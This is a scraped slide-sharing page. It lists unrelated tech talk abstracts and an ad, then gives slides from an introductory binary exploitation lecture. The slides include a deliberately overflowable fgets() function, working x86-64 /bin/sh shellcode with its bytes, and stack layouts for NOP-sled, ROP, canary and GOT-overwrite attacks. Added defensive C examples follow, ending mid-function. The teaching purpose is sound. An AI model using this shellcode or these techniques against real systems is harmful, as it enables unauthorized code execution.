This event is part of our ongoing series about IT Security. In this session, Carl Svensson, a security professional working in the Google Offensive Security team, gives us an introduction to Binary Exploitation. Watch the recording at https://dscmunich.de/binexp
Specializing the Data Path - Hooking into the Linux Network Stack (Kernel TLV)
Ever needed to add your custom logic into the network stack?
Ever hacked the network stack but wasn't certain you're doing it right?
Shmulik Ladkani talks about various mechanisms for customizing packet processing logic to the network stack's data path.
He covers topics such as packet sockets, netfilter hooks, traffic control actions and eBPF. We will discuss their applicable use cases, advantages and disadvantages.
Shmulik Ladkani is a Tech Lead at Ravello Systems.
Shmulik started his career at Jungo (acquired by NDS/Cisco) implementing residential gateway software, focusing on embedded Linux, Linux kernel, networking and hardware/software integration.
51966 coffees and billions of forwarded packets later, with millions of homes running his software, Shmulik left his position as Jungo’s lead architect and joined Ravello Systems (acquired by Oracle) as tech lead, developing a virtual data center as a cloud service. He's now focused around virtualization systems, network virtualization and SDN.
Introduction to Security, given by Bart Van Bos at Nalys.
Topics:
- Buffer overflows in C
- Counter measures
- Live demo of 2 attacks
- Shellcode generation
My talk about Tarantool and Lua at Percona Live 2016 (Konstantin Osipov)
In my talk I will focus on a practical use case: task queue
application, using Tarantool as an application server and a
database.
The idea of the task queue is that producers put tasks (objects)
into a queue, and consumers take tasks, perform them, mark as
completed.
The queue must guarantee certain properties: if a consumer failed,
a task should return to the queue automatically, a task can't be
taken by more than one consumer, priorities on tasks should be
satisfied.
With Tarantool, a task queue is a distributed networked
application: there are multiple consumer/producer endpoints
(hosts) through which a user can interact with the queue.
The queue itself is a fault-tolerant distributed database:
every task is stored in Tarantool database and replicated
in multiple copies.
If a machine goes down, the state of a task is tracked on a
replica, and the user can continue working with the
queue through a replica.
Total power failure is also not an issue, since tasks are stored
persistently on disk with transactional semantics.
Performance of such an application is in hundreds of thousands of
transactions per second.
At the same time, the queue is highly customizable, since it's
written entirely in Lua, is a Lua rock, but the code is running
inside the database. This is the strength of Lua:
one size doesn't have to fit all, and you don't have to sacrifice
performance if you need customization.
The second part of the talk will be about implementation details,
performance numbers, a performance comparison with other queue
products (beanstalkd, rabbitmq) in particular, and an overview
of the implementation from language bindings point of view: how we
make database API available in Lua, what are the challenges and
performance hurdles of such binding.
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc... (Area41)
Whether it's for malware analysis, vulnerability research or emulation, having a correct disassembly of a binary is the essential thing you need when you analyze code. Unfortunately, many people are not aware that there are a lot of opcodes that are rarely used in normal files, but valid for execution, but also several common opcodes have rarely seen behaviours, which could lead to wrong conclusions after an improper analysis.
For this research, I decided to go back to the basics and study assembly from scratch, covering all opcodes, whether they're obsolete or brand new, common or undocumented. This helped me to find bugs in all the disassemblers I tried, including the most famous ones. This presentation introduces the funniest aspects of the x86 CPUs, that I discovered in the process, including unexpected or rarely known opcodes and undocumented behavior of common opcodes.
The talk will also cover opcodes that are used in armored code (malware/commercial protectors) that are likely to break tools (disassemblers, analyzers, emulators, tracers,...), and introduce some useful tools and documents that were created in the process of the research.
Bio: Ange Albertini is a reverse-engineering and assembly language enthusiast for around 20 years, and malware analyst for 6 years. He has a technical blog, where he shares experimental sources files, and some infographics that are useful in his daily work.
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti (eurobsdcon)
Abstract
My work on the Octeon port made it possible for OpenBSD to run on the D-Link DSR line of mid-range routers and also improved all supported models through the drivers I wrote. I'm continuing my work on improving the OpenBSD experience on the Octeon products by enhancing network support (including advanced switch support, among other things) and adding disk support via USB and CFI. This presentation summarizes the developments I brought and the obstacles I faced.
Speaker bio
Paul is an OpenBSD developer since 2008, involved in ACPI, suspend and resume, power management, mips64, porting and currently with a keen interest in the Loongson and Octeon platforms. Currently he's a freelancer and also studying for his PhD in Parallel Algorithms for Signal Processing. In the past he worked for a telephony company developing VoIP, Voicemail and related software and after that as an antivirus engine developer and reverse engineer. In his spare time he enjoys a good game of Go, running or hiking.
How to write Rust instead of C and get away with it (Flavien Raynaud)
Ever tried optimizing a slow Python application and thought: “Oh! I wish I could just write this bit in Rust”? Well, turns out you can! Let’s discuss why Rust is a better choice than C, how to use Rust to make your apps lightning fast and how to get away with it, without your users even noticing.
As Infrastructure Engineers at Yelp, the challenge we face everyday is: scale. Yelp is mostly a Python shop, so our work often revolves around making Python applications run faster. Until now, we have been using different techniques: faster interpreters, or, more often, C code.
Given its safety guarantees, performance and promise of better tooling than C, we decided we had to give Rust a try. The initial results helped reinforce that there was a lot of opportunity for Rust to play an important role in our production code.
Yelp heavily relies on the Apache Avro serialization format for its internal infrastructure. During the talk, we will show how we implemented avro-rs, an Avro serialization/deserialization library in Rust, how we were able to call it from Python (and in theory from any other language) with very little code, using tools such as cbindgen, CFFI and Milksnake.
This talk would outline how easy it is to write interoperable code in a performant language like Rust and why a company should invest in Rust, over the many other available alternatives, to run production services.
Packet Filter is OpenBSD's system for filtering TCP/IP traffic and doing Network Address Translation. PF is also capable of normalizing and conditioning TCP/IP traffic, as well as providing bandwidth control and packet prioritization.
Asynchronous single page applications without a line of HTML or Javascript, o... (Robert Schadek)
AngularJS, together with Node.js, is an extremely powerful combination for building single page applications. Unfortunately, its development requires writing HTML and Javascript, which is tedious and error prone. By using vibe.d, HTML is no longer necessary, and the developers can use the full power of a static-typed language for the development of the backend. Substituting Javascript with Typescript in addition to a little bit of CTFE D magic then removes the need for redundant data type declarations, and makes everything statically typed. At the end of the talk, the attendee will have witnessed the creation of a statically typed, asynchronous single page application that required little extra typing than its dynamically typed equivalent. Additionally, the attendees will be motivated to explore the presented combination of frameworks as a viable desktop application UI framework.
Compromising Linux Virtual Machines with Debugging Mechanisms (Russell Sanford)
This presentation covers utilizing VMware's GDB debugging protocol to invasively inject commands into a Linux x64 target. Automatic detection of the kernel API is performed to locate the _vmalloc and call_usermodehelper* functions across all 3.x and 4.x kernels.
Modern computationally intensive tasks are rarely bottlenecked on the absolute performance of your processor cores; the real bottleneck in 2012 is getting data out of memory. CPU caches are designed to alleviate the difference in performance between CPU core clock speed and main memory clock speed, but developers rarely understand how this interaction works or how to measure or tune their application accordingly.
This talk aims to solve that by:
1. Describing how the CPU caches work in the latest Intel Hardware.
2. Showing people what and how to measure in order to understand the caching behaviour of their software.
3. Giving examples of how this affects Java Program performance and what can be done to address things.
The talk describes the design of, and practical experience with, the dynamic testing tools for C/C++ programs AddressSanitizer, ThreadSanitizer and MemorySanitizer. The tools find errors such as use after free, out-of-bounds accesses to arrays and objects, data races in multithreaded programs and use of uninitialized memory.
Nadav Markus goes over the path from a simple crash POC provided by Google Project Zero (for CVE-2015-7547), to a fully weaponized exploit.
He explores how an attacker can utilize the behavior of the Linux kernel in order to bypass ASLR, allowing an attacker to remotely execute code on vulnerable targets.
Agenda:
This talk will provide an in-depth review of the usage of canaries in the kernel and the interaction with userspace, as well as a short review of canaries and why they are needed in general so don't be afraid if you never heard of them.
Speaker:
Gil Yankovitch, CEO, Chief Security Researcher from Nyx Security Solutions
Binary art - Byte-ing the PE that fails you (extended offline version) (Ange Albertini)
This is the extended offline version of
an overview of the Portable Executable format and its malformations
presented at Hashdays, in Lucerne, on the 3rd November 2012
direct download link: http://corkami.googlecode.com/files/ange_albertini_hashdays_2012.zip
Linux kernel tracing superpowers in the cloud (Andrea Righi)
The Linux 4.x series introduced a new, powerful programmable tracing engine (BPF) that allows you to actually look inside the kernel at runtime. This talk will show you how to exploit this engine in order to debug problems or identify performance bottlenecks in a complex environment like a cloud. This talk will cover the latest Linux superpowers that allow you to see what is happening “under the hood” of the Linux kernel at runtime. I will explain how to exploit these “superpowers” to measure and trace complex events at runtime in a cloud environment. For example, we will see how we can measure the latency distribution of filesystem I/O, details of storage device operations such as individual block I/O request timeouts, or TCP buffer allocations, investigate stack traces of certain events, identify memory leaks and performance bottlenecks, and a whole lot more.
Profilers find performance bottlenecks in your app but provide confusing information. Let's give you insights into how your profiler and your app are really interacting. What profiling APIs are available, how they work, and what their implementation on the JVM (OpenJDK) side looks like:
Stack sampling profilers: stop motion view of your app
GetCallTrace(JVisualVM case study): The official stack sampling API
Safepoints and safepoint sampling bias
AsyncGetCallTrace(Honest Profiler Case Study): The unofficial API
JVM Profilers vs System Profilers: No API needed?
An introduction to exploit development.
I gave this talk at Hack the North 2014, and most of this information is pulled out of classics like Smashing the Stack for Fun and Profit, so there shouldn't be anything novel in here.
Presenter notes: https://www.dropbox.com/s/lq6oxuw1s3bhoun/Advanced%20Linux%20Game%20Programming%20%E2%80%93%20Presenter%20Notes.pdf
Ever since the advent of SteamOS, interest in game development for Linux has seen an increase. This lecture aims to address some more advanced issues encountered by programmers on this platform, beyond the very basic Linux setup, and drawing from over a year and two and a half games of experience in the subject. The areas discussed will be:
• Executable build improvements
• Crash handling and reporting
• Memory debugging
• OpenGL instrumentation and debugging
• Various caveats, tips and tricks.
Welcome to ViralQR, your best QR code generator. (ViralQR)
Welcome to ViralQR, your best QR code generator available on the market!
At ViralQR, we design static and dynamic QR codes. Our mission is to make business operations easier and customer engagement more powerful through the use of QR technology. Be it a small-scale business or a huge enterprise, our easy-to-use platform provides multiple choices that can be tailored according to your company's branding and marketing strategies.
Our Vision
We are here to make the process of creating QR codes easy and smooth, thus enhancing customer interaction and making business more fluid. We very strongly believe in the ability of QR codes to change the world for businesses in their interaction with customers and are set on making that technology accessible and usable far and wide.
Our Achievements
Ever since its inception, we have successfully served many clients by offering QR codes in their marketing, service delivery, and collection of feedback across various industries. Our platform has been recognized for its ease of use and amazing features, which helped a business to make QR codes.
Our Services
At ViralQR, here is a comprehensive suite of services that caters to your very needs:
Static QR Codes: Create free static QR codes. These QR codes are able to store significant information such as URLs, vCards, plain text, emails and SMS, Wi-Fi credentials, and Bitcoin addresses.
Dynamic QR codes: These also have all the advanced features but are subscription-based. They can directly link to PDF files, images, micro-landing pages, social accounts, review forms, business pages, and applications. In addition, they can be branded with CTAs, frames, patterns, colors, and logos to enhance your branding.
Pricing and Packages
Additionally, there is a 14-day free offer to ViralQR, which is an exceptional opportunity for new users to take a feel of this platform. One can easily subscribe from there and experience the full dynamic of using QR codes. The subscription plans are not only meant for business; they are priced very flexibly so that literally every business could afford to benefit from our service.
Why choose us?
ViralQR will provide services for marketing, advertising, catering, retail, and the like. The QR codes can be posted on fliers, packaging, merchandise, and banners, as well as to substitute for cash and cards in a restaurant or coffee shop. With QR codes integrated into your business, improve customer engagement and streamline operations.
Comprehensive Analytics
Subscribers of ViralQR receive detailed analytics and tracking tools in light of having a view of the core values of QR code performance. Our analytics dashboard shows aggregate views and unique views, as well as detailed information about each impression, including time, device, browser, and estimated location by city and country.
So, thank you for choosing ViralQR; we have an offer of nothing but the best in terms of QR code services to meet business diversity!
Securing your Kubernetes cluster: a step-by-step guide to success! (KatiaHIMEUR1)
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GraphRAG is All You need? LLM & Knowledge Graph (Guy Korland)
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
A tale of scale & speed: How the US Navy is enabling software delivery from l... (sonjaschweigert1)
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
The Art of the Pitch: WordPress Relationships and Sales (Laura Byrne)
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if something changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024 (Albert Hoitingh)
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... (UiPathCommunity)
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
UiPath Test Automation using UiPath Test Suite series, part 4 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 3 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Accelerate your Kubernetes clusters with Varnish Caching (Thijs Feryn)
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
6. Proprietary
What is an Exploit?
● Unintended behaviour
● State machine
○ Initial state
○ Reachable state
○ Invalid state
● Vulnerability
○ Unintended transition (bug)
○ Enabling an exploit
● Exploit
○ Transition to an Invalid state
○ "Dangerous" subset
7. A Note on Data
● We organize bits into groups - nibble, byte, word, dword, qword
● Bits are interpreted as integers, text, code, addresses, etc.
● Same data, different interpretations - Context determines
● Remember endianness - Little vs big
The same four bytes 0x41 0x42 0x43 0x44, read four ways:
65, 66, 67, 68 (integers)
"ABCD" (text)
inc ecx; inc edx; inc ebx; inc esp (32-bit x86 code)
0x44434241 = 1145258561 (little-endian dword)
Little: 0x44332211 = 0x11 0x22 0x33 0x44
Big: 0x44332211 = 0x44 0x33 0x22 0x11
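The four readings of the same bytes, as an added example that is not part of the talk: a small C program takes the slide's bytes 0x41 0x42 0x43 0x44 and reads them as integers, as text, as a little- or big-endian dword, and as 32-bit x86 opcodes. The function names and the SAMPLE array are this example's own; the decoder covers only the single-byte inc r32 opcodes 0x40-0x47 that the slide's bytes happen to fall into.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed sample input: the four bytes the slide reads four ways. */
static const unsigned char SAMPLE[4] = { 0x41, 0x42, 0x43, 0x44 };

/* Assemble four bytes into a 32-bit value, least significant byte first.
 * Written with shifts so the result does not depend on the host's byte order. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Same bytes, most significant byte first. */
uint32_t read_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* What the host CPU sees when it loads the four bytes as one dword.
 * memcpy avoids the aliasing problems of casting the pointer. */
uint32_t read_host32(const unsigned char *p)
{
    uint32_t v;
    memcpy(&v, p, sizeof v);
    return v;
}

/* 1 if this machine stores the low byte at the lowest address (x86 does). */
int host_is_little_endian(void)
{
    return read_host32(SAMPLE) == read_le32(SAMPLE);
}

/* The i-th byte (0..3) of v as it sits in memory under the given byte order,
 * i.e. the "Little: 0x44332211 = 0x11 0x22 0x33 0x44" line of the slide. */
unsigned byte_at(uint32_t v, int little, int i)
{
    int shift = little ? 8 * i : 8 * (3 - i);
    return (v >> shift) & 0xFF;
}

/* Read the bytes as text: a byte string carries no terminator of its own,
 * so one is appended before treating it as a C string. */
const char *sample_text(void)
{
    static char text[sizeof SAMPLE + 1];
    memcpy(text, SAMPLE, sizeof SAMPLE);
    text[sizeof SAMPLE] = '\0';
    return text;
}

/* Read one byte as 32-bit x86 code. Opcodes 0x40..0x47 are "inc r32" with the
 * register chosen by the low three bits (eax, ecx, edx, ebx, esp, ebp, esi, edi),
 * so 0x41 decodes to "inc ecx". In 64-bit mode the same bytes are REX prefixes,
 * which is the slide's point: the context decides what the data means. */
const char *decode_inc32(unsigned char op)
{
    static const char *const names[8] = {
        "inc eax", "inc ecx", "inc edx", "inc ebx",
        "inc esp", "inc ebp", "inc esi", "inc edi"
    };
    if (op < 0x40 || op > 0x47)
        return NULL;
    return names[op - 0x40];
}
```

read_host32 is the reading a program gets "for free" when it casts a byte pointer to an integer pointer, and it is the one that changes between architectures; read_le32 and read_be32 are what a parser should use when the byte order of the input is fixed by a file format or protocol.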
8. Where are We?
● Physics - Maxwell’s equations
● Circuits - Gates, flip-flops, wires
● Micro-architecture - Internals of CPU
● Machine code - Assembly translated to bytes
● Low-level code - C, Rust
● Mid-level code - Java, C#
● High-level code - Python, Javascript
12. x86 Calling convention
● Architecture specific
● x86, 32 bit, 64 bit
● Arguments
○ 32 bit: stack in reverse order
○ 64 bit: first few in registers
● Stack frame - base pointer
32 bit:
call 0xCAFEC0DE   =  push eip+5; jmp 0xCAFEC0DE
ret               =  pop eip
f(a, b)           =  push b; push a; call f
64 bit:
call rip+0x1337   =  push rip+5; jmp rip+0x1337
ret               =  pop rip
f(a, b)           =  mov rdi, a; mov rsi, b; call f
14. Stack buffer Overflow
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address
void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); /* size argument larger than buf: unchecked write */
}
Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()
Frame layout                Input written into it
[buf (16 bytes)]            [AAAABBBBCCCCDDDD]
[local1 (8 bytes)]          [EEEEFFFF]
[saved bp (8 bytes)]        [GGGGHHHH]
[return address (8 bytes)]  [JJJJKKKK]
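A bounded replacement for the fgets(buf) call above, added here as an example and not part of the talk. It reads with the real size of the destination, so the write cannot reach local1, the saved base pointer or the return address; it also tells a line that fit apart from one that was too long, and drains the excess instead of writing it anywhere. The read_line_bounded, vuln_fixed and feed helpers, and the use of POSIX fmemopen to drive them from a constructed string, are this example's own.

```c
#define _POSIX_C_SOURCE 200809L  /* for fmemopen */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16

/* Bounded line read. Returns 1 when a whole line fit in buf (newline
 * stripped), 0 when the line was longer than buf (the excess is discarded
 * rather than written past the buffer), -1 on end of input. */
int read_line_bounded(FILE *in, char *buf, size_t bufsz)
{
    if (bufsz == 0 || fgets(buf, (int)bufsz, in) == NULL)
        return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';           /* complete line: drop the newline */
        return 1;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;                    /* line filled buf exactly, or input ended */
    while (c != '\n' && c != EOF)    /* over-long line: drain the rest */
        c = fgetc(in);
    return 0;
}

/* The slide's vuln() with the read bounded by sizeof buf. If stored is
 * non-NULL it receives the number of bytes that ended up in the buffer. */
int vuln_fixed(FILE *in, size_t *stored)
{
    long local1 = 0;
    char buf[BUF_SIZE];
    int r = read_line_bounded(in, buf, sizeof buf);
    if (stored != NULL)
        *stored = (r < 0) ? 0 : strlen(buf);
    (void)local1;
    return r;
}

/* Run vuln_fixed on a constructed input string through an in-memory stream
 * so the behaviour can be checked without a terminal. -2 if the stream
 * could not be created. */
static int run(const char *input, size_t *stored)
{
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -2;
    int r = vuln_fixed(f, stored);
    fclose(f);
    return r;
}

/* Result code for a constructed input line. */
int feed(const char *input)
{
    return run(input, NULL);
}

/* How many bytes of a constructed input line were actually stored. */
size_t stored_length(const char *input)
{
    size_t n = 0;
    run(input, &n);
    return n;
}
```

The 40-byte "AAAABBBB...JJJJKKKK" line from the slide now stops at 15 characters (fgets always reserves one byte for the terminator) and is reported as too long instead of running into the return address.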
15. Shellcode
● Code that launches a shell
● Can also do other things
● Mostly written in C or ASM
● Needs to be location independent
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall
Assembled bytes:
0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f
0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7
0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
16. Stack buffer overflow - '96
● No protections present
● No longer viable
● A simple attack
○ Inject code
○ Overwrite return address with shellcode location
void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); /* size argument larger than buf: unchecked write */
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
Frame layout (buf at 0x00007FFFDEADC0DE)  Contents after the overflow
[buf (16 bytes)]                          [0x48 0x31 0xd2 0x48 ...]
[local1 (8 bytes)]                        [...]
[saved bp (8 bytes)]                      [... 0x3b 0x0f 0x05]
[return address (8 bytes)]                [0x00007FFFDEADC0DE]
17. Shellcode placement
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
○ NOP sled
void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); /* size argument larger than buf: unchecked write */
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
Frame layout (buf at 0x00007FFFDEADC0DE)  Contents after the overflow
[buf (12 bytes)] [local1 (8 bytes)]       [...] [...]
[saved bp (8 bytes)]                      [...]
[return address (8 bytes)]                [0x00007FFFDEADC102]
[prev frame (? bytes)]                    [0x48 0x31 0xd2 …]
18. Protection: ASLR - '01
● Address Space Layout Randomization
● Randomize location of stack and heap
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
○ Gadgets
Gadget in the (still non-randomized) code:
0x00007FFFCAFECAFE:
jmp rsp
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
Frame layout (buf at 0x????????, unknown)  Contents after the overflow
[buf (16 bytes)] [local1 (8 bytes)]        [...] [...]
[saved bp (8 bytes)]                       [...]
[return address (8 bytes)]                 [0x00007FFFCAFECAFE]
[prev frame (? bytes)]                     [0x48 0x31 0xd2 …]
19. Protection: NX/DEP - '97
● Adds permission bits to memory
○ Code: RX
○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location known
● Gadgets
○ Return-oriented programming
Gadgets in the (still non-randomized) code:
0x4000104A:
...
pop eax
ret
0x4000106A:
...
pop ebx
pop ecx
ret
Stack at 0x???????? after the overflow:
[AAAA...DDDD]  buf
[EEEE]         local1
[FFFF]         saved bp
[0x4000104A]   return address
[0xDEADBEEF]
[0x4000106A]
[0xCAFEBABE]
[0xFEEDF00D]
After the chain runs:
eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D
20. Protection: StackGuard - '98
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
○ Memory leak
○ Forking servers
void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); /* size argument larger than buf: unchecked write */
}
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
SECRET = ???
Frame layout                         Contents after the overflow
[buf (12 bytes)] [local1 (8 bytes)]  [...] [...]
[SECRET]                             [0x4141414141414141]
[saved bp (8 bytes)]                 [0x4141414141414141]
[return address (8 bytes)]           [0x00007FFFDEADC0DE]
What the compiler inserts:
void vuln() {
    push_cookie();
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); /* size argument larger than buf: unchecked write */
    check_cookie();
}
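The push_cookie()/check_cookie() pair above, made concrete as an added example that is not the talk's code: a struct stands in for the frame, the cookie comes from /dev/urandom with its low byte cleared, and an unchecked copy into the buffer is followed by the check. The struct and function names are this example's own, and the layout includes the padding a compiler inserts after the 12-byte buffer, so the cookie sits at offsetof(struct frame, cookie) rather than at byte 12.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed stand-in for the frame on the slide: buffer, local1, the
 * cookie, then the values an overflow would reach next. A real compiler lays
 * this out in the stack frame; here it is a struct so the mechanics are
 * visible without compiler support. */
struct frame {
    char buf[12];
    long local1;
    uint64_t cookie;
    uint64_t saved_bp;
    uint64_t ret_addr;
};

/* Fresh secret for this process, read from /dev/urandom the way the loader
 * seeds the stack protector. The low byte is cleared (glibc does the same),
 * so a string copy that runs into the cookie has to write a NUL there first,
 * which stops str*-style overflows. A forked child that keeps running with
 * the parent's value keeps the same secret: the weakness the slide notes. */
uint64_t make_cookie(void)
{
    uint64_t c = 0;
    FILE *f = fopen("/dev/urandom", "rb");
    if (f != NULL) {
        if (fread(&c, sizeof c, 1, f) != 1)
            c = 0;
        fclose(f);
    }
    if (c == 0)
        c = 0x5A5A5A5A5A5A5A5AULL;   /* constructed fallback, not secret */
    return c & ~(uint64_t)0xFF;
}

/* push_cookie(): store the secret between the locals and the control data. */
void push_cookie(struct frame *fr, uint64_t cookie)
{
    fr->cookie = cookie;
}

/* check_cookie(): 1 if the secret is intact, 0 if something overwrote it.
 * The real stack protector calls __stack_chk_fail here and aborts. */
int check_cookie(const struct frame *fr, uint64_t cookie)
{
    return fr->cookie == cookie;
}

/* The slide's vuln() with the cookie calls made explicit. The copy is
 * unchecked on purpose (that is the bug being caught); it is bounded only
 * by the frame size so the demonstration stays inside the object.
 * Returns 1 when the cookie survived, 0 when the overflow was detected,
 * -1 if the input is larger than the whole frame. */
int vuln_with_cookie(struct frame *fr, uint64_t cookie,
                     const unsigned char *input, size_t n)
{
    if (n > sizeof *fr)
        return -1;
    push_cookie(fr, cookie);
    memcpy((unsigned char *)fr + offsetof(struct frame, buf), input, n);
    return check_cookie(fr, cookie);
}

/* Run vuln_with_cookie on constructed input of n 'A' bytes.
 * Returns 1 if the overflow was detected, 0 if not, -1 if n is too large. */
int overflow_detected(size_t n)
{
    struct frame fr;
    unsigned char input[sizeof fr];
    if (n > sizeof input)
        return -1;
    memset(&fr, 0, sizeof fr);
    memset(input, 'A', n);
    return vuln_with_cookie(&fr, make_cookie(), input, n) == 0;
}
```

Anything that writes past local1 changes the cookie's low byte from 0x00 to 0x41 and is caught before the saved base pointer or return address is used; a write that stays within buf and local1 passes the check, which is why the protection catches overflows but not out-of-bounds writes that skip over the cookie.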
21. GOT/PLT Overwrite
● Procedure Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function
...
call printf@plt
...
printf@plt:
jmp [printf@got]
Before: printf@got: 0x7FFFC0DECAFE
After overwrite: printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...
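The three protections from the slides above can all be read from a binary's ELF headers: ASLR only moves code that was built position-independent (e_type is ET_DYN), NX comes from the PT_GNU_STACK program header lacking PF_X, and a PT_GNU_RELRO segment is what lets the loader make the GOT read-only so an overwrite like the one just shown faults. The checker below is an added example, not the talk's code. It parses an ELF64 image held in memory using the types from <elf.h>, bounds-checks the header table before trusting it, and is exercised on constructed images; struct hardening, inspect_elf64, build_sample_elf and sample_summary are names chosen here.

```c
#include <elf.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Summary of one ELF64 image (this example's own struct, not a libc type). */
struct hardening {
    int pie;        /* ET_DYN executable: code is relocated, so ASLR moves it too */
    int nx_stack;   /* PT_GNU_STACK present without PF_X: stack not executable */
    int relro;      /* PT_GNU_RELRO present: GOT region read-only after relocation */
};

/* Parse the ELF header and program headers of an image held in memory.
 * Returns 0 on success, -1 if the bytes are not a consistent ELF64 image.
 * A missing PT_GNU_STACK is reported as nx_stack = 0: the kernel then falls
 * back to an architecture default, which this check does not vouch for. */
int inspect_elf64(const unsigned char *img, size_t len, struct hardening *out)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh)
        return -1;
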